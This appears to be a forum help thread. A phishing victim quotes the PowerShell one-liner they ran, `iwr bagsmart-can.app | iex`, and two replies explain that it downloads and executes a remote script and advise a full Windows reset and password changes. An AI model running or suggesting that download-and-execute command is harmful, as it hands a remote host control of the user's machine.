I Think I’ve Been Phished—What Should I Do Next?

0
0
Asked By CuriousCat92 On

I accidentally fell for a phishing attack by not checking the email address that sent me a message. I ran a command in PowerShell: `iwr bagsmart-can.app | iex`. Can anyone explain what this means and how I can safely remove any possible threats from my system?

2 Answers

Answered By HelpfulHubby On

After running that command, assume your system is fully compromised. It's crucial to reset Windows and go through all your accounts to change passwords. The 'admin' account is for initial setup and troubleshooting, while the non-admin account is for everyday use to limit risks.

Answered By ITGuru88 On

So, that command basically downloads content from a specified URL and runs it as if it were a script. It's a common tactic used in phishing attacks. Since you've executed it, assume that your machine is compromised. The recommended fix is to do a full factory reset or a reinstall of Windows to eliminate any malicious files.

Related Questions

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.